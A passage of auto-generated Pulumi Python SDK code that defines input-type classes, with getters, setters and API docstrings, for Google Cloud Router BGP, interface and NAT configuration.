pulumi.set(__self__, "keepalive_interval", keepalive_interval)
@property
@pulumi.getter(name="advertiseMode")
def advertise_mode(self) -> Optional[pulumi.Input['RouterBgpAdvertiseMode']]:
"""
User-specified flag to indicate which mode to use for advertisement. The options are DEFAULT or CUSTOM.
"""
return pulumi.get(self, "advertise_mode")
@advertise_mode.setter
def advertise_mode(self, value: Optional[pulumi.Input['RouterBgpAdvertiseMode']]):
pulumi.set(self, "advertise_mode", value)
@property
@pulumi.getter(name="advertisedGroups")
def advertised_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpAdvertisedGroupsItem']]]]:
"""
User-specified list of prefix groups to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and is advertised to all peers of the router. These groups will be advertised in addition to any specified prefixes. Leave this field blank to advertise no custom groups.
"""
return pulumi.get(self, "advertised_groups")
@advertised_groups.setter
def advertised_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpAdvertisedGroupsItem']]]]):
pulumi.set(self, "advertised_groups", value)
@property
@pulumi.getter(name="advertisedIpRanges")
def advertised_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]]:
"""
User-specified list of individual IP ranges to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and is advertised to all peers of the router. These IP ranges will be advertised in addition to any specified groups. Leave this field blank to advertise no custom IP ranges.
"""
return pulumi.get(self, "advertised_ip_ranges")
@advertised_ip_ranges.setter
def advertised_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]]):
pulumi.set(self, "advertised_ip_ranges", value)
@property
@pulumi.getter
def asn(self) -> Optional[pulumi.Input[int]]:
"""
Local BGP Autonomous System Number (ASN). Must be an RFC6996 private ASN, either 16-bit or 32-bit. The value will be fixed for this router resource. All VPN tunnels that link to this router will have the same local ASN.
"""
return pulumi.get(self, "asn")
@asn.setter
def asn(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "asn", value)
@property
@pulumi.getter(name="keepaliveInterval")
def keepalive_interval(self) -> Optional[pulumi.Input[int]]:
"""
The interval in seconds between BGP keepalive messages that are sent to the peer. Hold time is three times the interval at which keepalive messages are sent, and the hold time is the maximum number of seconds allowed to elapse between successive keepalive messages that BGP receives from a peer. BGP will use the smaller of either the local hold time value or the peer's hold time value as the hold time for the BGP connection between the two peers. If set, this value must be between 20 and 60. The default is 20.
"""
return pulumi.get(self, "keepalive_interval")
@keepalive_interval.setter
def keepalive_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "keepalive_interval", value)
@pulumi.input_type
class RouterInterfaceArgs:
def __init__(__self__, *,
ip_range: Optional[pulumi.Input[str]] = None,
linked_interconnect_attachment: Optional[pulumi.Input[str]] = None,
linked_vpn_tunnel: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
redundant_interface: Optional[pulumi.Input[str]] = None,
subnetwork: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] ip_range: IP address and range of the interface. The IP range must be in the RFC3927 link-local IP address space. The value must be a CIDR-formatted string, for example: 169.254.0.1/30. NOTE: Do not truncate the address as it represents the IP address of the interface.
:param pulumi.Input[str] linked_interconnect_attachment: URI of the linked Interconnect attachment. It must be in the same region as the router. Each interface can have one linked resource, which can be a VPN tunnel, an Interconnect attachment, or a virtual machine instance.
:param pulumi.Input[str] linked_vpn_tunnel: URI of the linked VPN tunnel, which must be in the same region as the router. Each interface can have one linked resource, which can be a VPN tunnel, an Interconnect attachment, or a virtual machine instance.
:param pulumi.Input[str] name: Name of this interface entry. The name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input[str] private_ip_address: The regional private internal IP address that is used to establish BGP sessions to a VM instance acting as a third-party Router Appliance, such as a Next Gen Firewall, a Virtual Router, or an SD-WAN VM.
:param pulumi.Input[str] redundant_interface: Name of the interface that will be redundant with the current interface you are creating. The redundantInterface must belong to the same Cloud Router as the interface here. To establish the BGP session to a Router Appliance VM, you must create two BGP peers. The two BGP peers must be attached to two separate interfaces that are redundant with each other. The redundant_interface must be 1-63 characters long, and comply with RFC1035. Specifically, the redundant_interface must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input[str] subnetwork: The URI of the subnetwork resource that this interface belongs to, which must be in the same region as the Cloud Router. When you establish a BGP session to a VM instance using this interface, the VM instance must belong to the same subnetwork as the subnetwork specified here.
"""
if ip_range is not None:
pulumi.set(__self__, "ip_range", ip_range)
if linked_interconnect_attachment is not None:
pulumi.set(__self__, "linked_interconnect_attachment", linked_interconnect_attachment)
if linked_vpn_tunnel is not None:
pulumi.set(__self__, "linked_vpn_tunnel", linked_vpn_tunnel)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if redundant_interface is not None:
pulumi.set(__self__, "redundant_interface", redundant_interface)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
@property
@pulumi.getter(name="ipRange")
def ip_range(self) -> Optional[pulumi.Input[str]]:
"""
IP address and range of the interface. The IP range must be in the RFC3927 link-local IP address space. The value must be a CIDR-formatted string, for example: 169.254.0.1/30. NOTE: Do not truncate the address as it represents the IP address of the interface.
"""
return pulumi.get(self, "ip_range")
@ip_range.setter
def ip_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_range", value)
@property
@pulumi.getter(name="linkedInterconnectAttachment")
def linked_interconnect_attachment(self) -> Optional[pulumi.Input[str]]:
"""
URI of the linked Interconnect attachment. It must be in the same region as the router. Each interface can have one linked resource, which can be a VPN tunnel, an Interconnect attachment, or a virtual machine instance.
"""
return pulumi.get(self, "linked_interconnect_attachment")
@linked_interconnect_attachment.setter
def linked_interconnect_attachment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_interconnect_attachment", value)
@property
@pulumi.getter(name="linkedVpnTunnel")
def linked_vpn_tunnel(self) -> Optional[pulumi.Input[str]]:
"""
URI of the linked VPN tunnel, which must be in the same region as the router. Each interface can have one linked resource, which can be a VPN tunnel, an Interconnect attachment, or a virtual machine instance.
"""
return pulumi.get(self, "linked_vpn_tunnel")
@linked_vpn_tunnel.setter
def linked_vpn_tunnel(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_vpn_tunnel", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of this interface entry. The name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The regional private internal IP address that is used to establish BGP sessions to a VM instance acting as a third-party Router Appliance, such as a Next Gen Firewall, a Virtual Router, or an SD-WAN VM.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="redundantInterface")
def redundant_interface(self) -> Optional[pulumi.Input[str]]:
"""
Name of the interface that will be redundant with the current interface you are creating. The redundantInterface must belong to the same Cloud Router as the interface here. To establish the BGP session to a Router Appliance VM, you must create two BGP peers. The two BGP peers must be attached to two separate interfaces that are redundant with each other. The redundant_interface must be 1-63 characters long, and comply with RFC1035. Specifically, the redundant_interface must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "redundant_interface")
@redundant_interface.setter
def redundant_interface(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "redundant_interface", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the subnetwork resource that this interface belongs to, which must be in the same region as the Cloud Router. When you establish a BGP session to a VM instance using this interface, the VM instance must belong to the same subnetwork as the subnetwork specified here.
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@pulumi.input_type
class RouterNatLogConfigArgs:
def __init__(__self__, *,
enable: Optional[pulumi.Input[bool]] = None,
filter: Optional[pulumi.Input['RouterNatLogConfigFilter']] = None):
"""
Configuration of logging on a NAT.
:param pulumi.Input[bool] enable: Indicates whether or not to export logs. This is false by default.
:param pulumi.Input['RouterNatLogConfigFilter'] filter: Specify the desired filtering of logs on this NAT. If unspecified, logs are exported for all connections handled by this NAT. This option can take one of the following values: - ERRORS_ONLY: Export logs only for connection failures. - TRANSLATIONS_ONLY: Export logs only for successful connections. - ALL: Export logs for all connections, successful and unsuccessful.
"""
if enable is not None:
pulumi.set(__self__, "enable", enable)
if filter is not None:
pulumi.set(__self__, "filter", filter)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to export logs. This is false by default.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter
def filter(self) -> Optional[pulumi.Input['RouterNatLogConfigFilter']]:
"""
Specify the desired filtering of logs on this NAT. If unspecified, logs are exported for all connections handled by this NAT. This option can take one of the following values: - ERRORS_ONLY: Export logs only for connection failures. - TRANSLATIONS_ONLY: Export logs only for successful connections. - ALL: Export logs for all connections, successful and unsuccessful.
"""
return pulumi.get(self, "filter")
@filter.setter
def filter(self, value: Optional[pulumi.Input['RouterNatLogConfigFilter']]):
pulumi.set(self, "filter", value)
@pulumi.input_type
class RouterNatRuleActionArgs:
def __init__(__self__, *,
source_nat_active_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_nat_drain_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_nat_active_ips: A list of URLs of the IP resources used for this NAT rule. These IP addresses must be valid static external IP addresses assigned to the project. This field is used for public NAT.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_nat_drain_ips: A list of URLs of the IP resources to be drained. These IPs must be valid static external IPs that have been assigned to the NAT. These IPs should be used for updating/patching a NAT rule only. This field is used for public NAT.
"""
if source_nat_active_ips is not None:
pulumi.set(__self__, "source_nat_active_ips", source_nat_active_ips)
if source_nat_drain_ips is not None:
pulumi.set(__self__, "source_nat_drain_ips", source_nat_drain_ips)
@property
@pulumi.getter(name="sourceNatActiveIps")
def source_nat_active_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of URLs of the IP resources used for this NAT rule. These IP addresses must be valid static external IP addresses assigned to the project. This field is used for public NAT.
"""
return pulumi.get(self, "source_nat_active_ips")
@source_nat_active_ips.setter
def source_nat_active_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_nat_active_ips", value)
@property
@pulumi.getter(name="sourceNatDrainIps")
def source_nat_drain_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of URLs of the IP resources to be drained. These IPs must be valid static external IPs that have been assigned to the NAT. These IPs should be used for updating/patching a NAT rule only. This field is used for public NAT.
"""
return pulumi.get(self, "source_nat_drain_ips")
@source_nat_drain_ips.setter
def source_nat_drain_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_nat_drain_ips", value)
@pulumi.input_type
class RouterNatRuleArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input['RouterNatRuleActionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
match: Optional[pulumi.Input[str]] = None,
rule_number: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input['RouterNatRuleActionArgs'] action: The action to be enforced for traffic that matches this rule.
:param pulumi.Input[str] description: An optional description of this rule.
:param pulumi.Input[str] match: CEL expression that specifies the match condition that egress traffic from a VM is evaluated against. If it evaluates to true, the corresponding `action` is enforced. The following examples are valid match expressions for public NAT: "inIpRange(destination.ip, '1.1.0.0/16') || inIpRange(destination.ip, '2.2.0.0/16')" "destination.ip == '1.1.0.1' || destination.ip == '8.8.8.8'" The following example is a valid match expression for private NAT: "nexthop.hub == 'https://networkconnectivity.googleapis.com/v1alpha1/projects/my-project/global/hub/hub-1'"
:param pulumi.Input[int] rule_number: An integer uniquely identifying a rule in the list. The rule number must be a positive value between 0 and 65000, and must be unique among rules within a NAT.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if description is not None:
pulumi.set(__self__, "description", description)
if match is not None:
pulumi.set(__self__, "match", match)
if rule_number is not None:
pulumi.set(__self__, "rule_number", rule_number)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['RouterNatRuleActionArgs']]:
"""
The action to be enforced for traffic that matches this rule.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['RouterNatRuleActionArgs']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input[str]]:
"""
CEL expression that specifies the match condition that egress traffic from a VM is evaluated against. If it evaluates to true, the corresponding `action` is enforced. The following examples are valid match expressions for public NAT: "inIpRange(destination.ip, '1.1.0.0/16') || inIpRange(destination.ip, '2.2.0.0/16')" "destination.ip == '1.1.0.1' || destination.ip == '8.8.8.8'" The following example is a valid match expression for private NAT: "nexthop.hub == 'https://networkconnectivity.googleapis.com/v1alpha1/projects/my-project/global/hub/hub-1'"
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "match", value)
@property
@pulumi.getter(name="ruleNumber")
def rule_number(self) -> Optional[pulumi.Input[int]]:
"""
An integer uniquely identifying a rule in the list. The rule number must be a positive value between 0 and 65000, and must be unique among rules within a NAT.
"""
return pulumi.get(self, "rule_number")
@rule_number.setter
def rule_number(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "rule_number", value)
@pulumi.input_type
class RouterNatSubnetworkToNatArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
secondary_ip_range_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_ip_ranges_to_nat: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatSourceIpRangesToNatItem']]]] = None):
"""
Defines the IP ranges that want to use NAT for a subnetwork.
:param pulumi.Input[str] name: URL for the subnetwork resource that will use NAT.
:param pulumi.Input[Sequence[pulumi.Input[str]]] secondary_ip_range_names: A list of the secondary ranges of the Subnetwork that are allowed to use NAT. This can be populated only if "LIST_OF_SECONDARY_IP_RANGES" is one of the values in source_ip_ranges_to_nat.
:param pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatSourceIpRangesToNatItem']]] source_ip_ranges_to_nat: Specify the options for NAT ranges in the Subnetwork. All options of a single value are valid except NAT_IP_RANGE_OPTION_UNSPECIFIED. The only valid option with multiple values is: ["PRIMARY_IP_RANGE", "LIST_OF_SECONDARY_IP_RANGES"] Default: [ALL_IP_RANGES]
"""
if name is not None:
pulumi.set(__self__, "name", name)
if secondary_ip_range_names is not None:
pulumi.set(__self__, "secondary_ip_range_names", secondary_ip_range_names)
if source_ip_ranges_to_nat is not None:
pulumi.set(__self__, "source_ip_ranges_to_nat", source_ip_ranges_to_nat)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
URL for the subnetwork resource that will use NAT.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="secondaryIpRangeNames")
def secondary_ip_range_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the secondary ranges of the Subnetwork that are allowed to use NAT. This can be populated only if "LIST_OF_SECONDARY_IP_RANGES" is one of the values in source_ip_ranges_to_nat.
"""
return pulumi.get(self, "secondary_ip_range_names")
@secondary_ip_range_names.setter
def secondary_ip_range_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "secondary_ip_range_names", value)
@property
@pulumi.getter(name="sourceIpRangesToNat")
def source_ip_ranges_to_nat(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatSourceIpRangesToNatItem']]]]:
"""
Specify the options for NAT ranges in the Subnetwork. All options of a single value are valid except NAT_IP_RANGE_OPTION_UNSPECIFIED. The only valid option with multiple values is: ["PRIMARY_IP_RANGE", "LIST_OF_SECONDARY_IP_RANGES"] Default: [ALL_IP_RANGES]
"""
return pulumi.get(self, "source_ip_ranges_to_nat")
@source_ip_ranges_to_nat.setter
def source_ip_ranges_to_nat(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatSourceIpRangesToNatItem']]]]):
pulumi.set(self, "source_ip_ranges_to_nat", value)
@pulumi.input_type
class RouterNatArgs:
def __init__(__self__, *,
drain_nat_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_dynamic_port_allocation: Optional[pulumi.Input[bool]] = None,
enable_endpoint_independent_mapping: Optional[pulumi.Input[bool]] = None,
icmp_idle_timeout_sec: Optional[pulumi.Input[int]] = None,
log_config: Optional[pulumi.Input['RouterNatLogConfigArgs']] = None,
max_ports_per_vm: Optional[pulumi.Input[int]] = None,
min_ports_per_vm: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
nat_ip_allocate_option: Optional[pulumi.Input['RouterNatNatIpAllocateOption']] = None,
nat_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatRuleArgs']]]] = None,
source_subnetwork_ip_ranges_to_nat: Optional[pulumi.Input['RouterNatSourceSubnetworkIpRangesToNat']] = None,
subnetworks: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatArgs']]]] = None,
tcp_established_idle_timeout_sec: Optional[pulumi.Input[int]] = None,
tcp_time_wait_timeout_sec: Optional[pulumi.Input[int]] = None,
tcp_transitory_idle_timeout_sec: Optional[pulumi.Input[int]] = None,
udp_idle_timeout_sec: Optional[pulumi.Input[int]] = None):
"""
Represents a Nat resource. It enables the VMs within the specified subnetworks to access Internet without external IP addresses. It specifies a list of subnetworks (and the ranges within) that want to use NAT. Customers can also provide the external IPs that would be used for NAT. GCP would auto-allocate ephemeral IPs if no external IPs are provided.
:param pulumi.Input[Sequence[pulumi.Input[str]]] drain_nat_ips: A list of URLs of the IP resources to be drained. These IPs must be valid static external IPs that have been assigned to the NAT. These IPs should be used for updating/patching a NAT only.
:param pulumi.Input[bool] enable_dynamic_port_allocation: Enable Dynamic Port Allocation. If not specified, it is disabled by default. If set to true, - Dynamic Port Allocation will be enabled on this NAT config. - enableEndpointIndependentMapping cannot be set to true. - If minPorts is set, minPortsPerVm must be set to a power of two greater than or equal to 32. If minPortsPerVm is not set, a minimum of 32 ports will be allocated to a VM from this NAT config.
:param pulumi.Input[int] icmp_idle_timeout_sec: Timeout (in seconds) for ICMP connections. Defaults to 30s if not set.
:param pulumi.Input['RouterNatLogConfigArgs'] log_config: Configure logging on this NAT.
:param pulumi.Input[int] max_ports_per_vm: Maximum number of ports allocated to a VM from this NAT config when Dynamic Port Allocation is enabled. If Dynamic Port Allocation is not enabled, this field has no effect. If Dynamic Port Allocation is enabled, and this field is set, it must be set to a power of two greater than minPortsPerVm, or 64 if minPortsPerVm is not set. If Dynamic Port Allocation is enabled and this field is not set, a maximum of 65536 ports will be allocated to a VM from this NAT config.
:param pulumi.Input[int] min_ports_per_vm: Minimum number of ports allocated to a VM from this NAT config. If not set, a default number of ports is allocated to a VM. This is rounded up to the nearest power of 2. For example, if the value of this field is 50, at least 64 ports are allocated to a VM.
:param pulumi.Input[str] name: Unique name of this Nat service. The name must be 1-63 characters long and comply with RFC1035.
:param pulumi.Input['RouterNatNatIpAllocateOption'] nat_ip_allocate_option: Specify the NatIpAllocateOption, which can take one of the following values: - MANUAL_ONLY: Uses only Nat IP addresses provided by customers. When there are not enough specified Nat IPs, the Nat service fails for new VMs. - AUTO_ONLY: Nat IPs are allocated by Google Cloud Platform; customers can't specify any Nat IPs. When choosing AUTO_ONLY, then nat_ip should be empty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nat_ips: A list of URLs of the IP resources used for this Nat service. These IP addresses must be valid static external IP addresses assigned to the project.
:param pulumi.Input[Sequence[pulumi.Input['RouterNatRuleArgs']]] rules: A list of rules associated with this NAT.
:param pulumi.Input['RouterNatSourceSubnetworkIpRangesToNat'] source_subnetwork_ip_ranges_to_nat: Specify the Nat option, which can take one of the following values: - ALL_SUBNETWORKS_ALL_IP_RANGES: All of the IP ranges in every Subnetwork are allowed to Nat. - ALL_SUBNETWORKS_ALL_PRIMARY_IP_RANGES: All of the primary IP ranges in every Subnetwork are allowed to Nat. - LIST_OF_SUBNETWORKS: A list of Subnetworks are allowed to Nat (specified in the field subnetwork below) The default is SUBNETWORK_IP_RANGE_TO_NAT_OPTION_UNSPECIFIED. Note that if this field contains ALL_SUBNETWORKS_ALL_IP_RANGES or ALL_SUBNETWORKS_ALL_PRIMARY_IP_RANGES, then there should not be any other Router.Nat section in any Router for this network in this region.
:param pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatArgs']]] subnetworks: A list of Subnetwork resources whose traffic should be translated by NAT Gateway. It is used only when LIST_OF_SUBNETWORKS is selected for the SubnetworkIpRangeToNatOption above.
:param pulumi.Input[int] tcp_established_idle_timeout_sec: Timeout (in seconds) for TCP established connections. Defaults to 1200s if not set.
:param pulumi.Input[int] tcp_time_wait_timeout_sec: Timeout (in seconds) for TCP connections that are in TIME_WAIT state. Defaults to 120s if not set.
:param pulumi.Input[int] tcp_transitory_idle_timeout_sec: Timeout (in seconds) for TCP transitory connections. Defaults to 30s if not set.
:param pulumi.Input[int] udp_idle_timeout_sec: Timeout (in seconds) for UDP connections. Defaults to 30s if not set.
"""
if drain_nat_ips is not None:
pulumi.set(__self__, "drain_nat_ips", drain_nat_ips)
if enable_dynamic_port_allocation is not None:
pulumi.set(__self__, "enable_dynamic_port_allocation", enable_dynamic_port_allocation)
if enable_endpoint_independent_mapping is not None:
pulumi.set(__self__, "enable_endpoint_independent_mapping", enable_endpoint_independent_mapping)
if icmp_idle_timeout_sec is not None:
pulumi.set(__self__, "icmp_idle_timeout_sec", icmp_idle_timeout_sec)
if log_config is not None:
pulumi.set(__self__, "log_config", log_config)
if max_ports_per_vm is not None:
pulumi.set(__self__, "max_ports_per_vm", max_ports_per_vm)
if min_ports_per_vm is not None:
pulumi.set(__self__, "min_ports_per_vm", min_ports_per_vm)
if name is not None:
pulumi.set(__self__, "name", name)
if nat_ip_allocate_option is not None:
pulumi.set(__self__, "nat_ip_allocate_option", nat_ip_allocate_option)
if nat_ips is not None:
pulumi.set(__self__, "nat_ips", nat_ips)
if rules is not None:
pulumi.set(__self__, "rules", rules)
if source_subnetwork_ip_ranges_to_nat is not None:
pulumi.set(__self__, "source_subnetwork_ip_ranges_to_nat", source_subnetwork_ip_ranges_to_nat)
if subnetworks is not None:
pulumi.set(__self__, "subnetworks", subnetworks)
if tcp_established_idle_timeout_sec is not None:
pulumi.set(__self__, "tcp_established_idle_timeout_sec", tcp_established_idle_timeout_sec)
if tcp_time_wait_timeout_sec is not None:
pulumi.set(__self__, "tcp_time_wait_timeout_sec", tcp_time_wait_timeout_sec)
if tcp_transitory_idle_timeout_sec is not None:
pulumi.set(__self__, "tcp_transitory_idle_timeout_sec", tcp_transitory_idle_timeout_sec)
if udp_idle_timeout_sec is not None:
pulumi.set(__self__, "udp_idle_timeout_sec", udp_idle_timeout_sec)
@property
@pulumi.getter(name="drainNatIps")
def drain_nat_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of URLs of the IP resources to be drained. These IPs must be valid static external IPs that have been assigned to the NAT. These IPs should be used for updating/patching a NAT only.
"""
return pulumi.get(self, "drain_nat_ips")
@drain_nat_ips.setter
def drain_nat_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "drain_nat_ips", value)
@property
@pulumi.getter(name="enableDynamicPortAllocation")
def enable_dynamic_port_allocation(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Dynamic Port Allocation. If not specified, it is disabled by default. If set to true, - Dynamic Port Allocation will be enabled on this NAT config. - enableEndpointIndependentMapping cannot be set to true. - If minPorts is set, minPortsPerVm must be set to a power of two greater than or equal to 32. If minPortsPerVm is not set, a minimum of 32 ports will be allocated to a VM from this NAT config.
"""
return pulumi.get(self, "enable_dynamic_port_allocation")
@enable_dynamic_port_allocation.setter
def enable_dynamic_port_allocation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_dynamic_port_allocation", value)
@property
@pulumi.getter(name="enableEndpointIndependentMapping")
def enable_endpoint_independent_mapping(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enable_endpoint_independent_mapping")
@enable_endpoint_independent_mapping.setter
def enable_endpoint_independent_mapping(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_endpoint_independent_mapping", value)
@property
@pulumi.getter(name="icmpIdleTimeoutSec")
def icmp_idle_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Timeout (in seconds) for ICMP connections. Defaults to 30s if not set.
"""
return pulumi.get(self, "icmp_idle_timeout_sec")
@icmp_idle_timeout_sec.setter
def icmp_idle_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "icmp_idle_timeout_sec", value)
@property
@pulumi.getter(name="logConfig")
def log_config(self) -> Optional[pulumi.Input['RouterNatLogConfigArgs']]:
"""
Configure logging on this NAT.
"""
return pulumi.get(self, "log_config")
@log_config.setter
def log_config(self, value: Optional[pulumi.Input['RouterNatLogConfigArgs']]):
pulumi.set(self, "log_config", value)
@property
@pulumi.getter(name="maxPortsPerVm")
def max_ports_per_vm(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of ports allocated to a VM from this NAT config when Dynamic Port Allocation is enabled. If Dynamic Port Allocation is not enabled, this field has no effect. If Dynamic Port Allocation is enabled, and this field is set, it must be set to a power of two greater than minPortsPerVm, or 64 if minPortsPerVm is not set. If Dynamic Port Allocation is enabled and this field is not set, a maximum of 65536 ports will be allocated to a VM from this NAT config.
"""
return pulumi.get(self, "max_ports_per_vm")
@max_ports_per_vm.setter
def max_ports_per_vm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_ports_per_vm", value)
@property
@pulumi.getter(name="minPortsPerVm")
def min_ports_per_vm(self) -> Optional[pulumi.Input[int]]:
"""
Minimum number of ports allocated to a VM from this NAT config. If not set, a default number of ports is allocated to a VM. This is rounded up to the nearest power of 2. For example, if the value of this field is 50, at least 64 ports are allocated to a VM.
"""
return pulumi.get(self, "min_ports_per_vm")
@min_ports_per_vm.setter
def min_ports_per_vm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_ports_per_vm", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Unique name of this Nat service. The name must be 1-63 characters long and comply with RFC1035.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="natIpAllocateOption")
def nat_ip_allocate_option(self) -> Optional[pulumi.Input['RouterNatNatIpAllocateOption']]:
"""
Specify the NatIpAllocateOption, which can take one of the following values: - MANUAL_ONLY: Uses only Nat IP addresses provided by customers. When there are not enough specified Nat IPs, the Nat service fails for new VMs. - AUTO_ONLY: Nat IPs are allocated by Google Cloud Platform; customers can't specify any Nat IPs. When choosing AUTO_ONLY, then nat_ip should be empty.
"""
return pulumi.get(self, "nat_ip_allocate_option")
@nat_ip_allocate_option.setter
def nat_ip_allocate_option(self, value: Optional[pulumi.Input['RouterNatNatIpAllocateOption']]):
pulumi.set(self, "nat_ip_allocate_option", value)
@property
@pulumi.getter(name="natIps")
def nat_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of URLs of the IP resources used for this Nat service. These IP addresses must be valid static external IP addresses assigned to the project.
"""
return pulumi.get(self, "nat_ips")
@nat_ips.setter
def nat_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nat_ips", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatRuleArgs']]]]:
"""
A list of rules associated with this NAT.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatRuleArgs']]]]):
pulumi.set(self, "rules", value)
@property
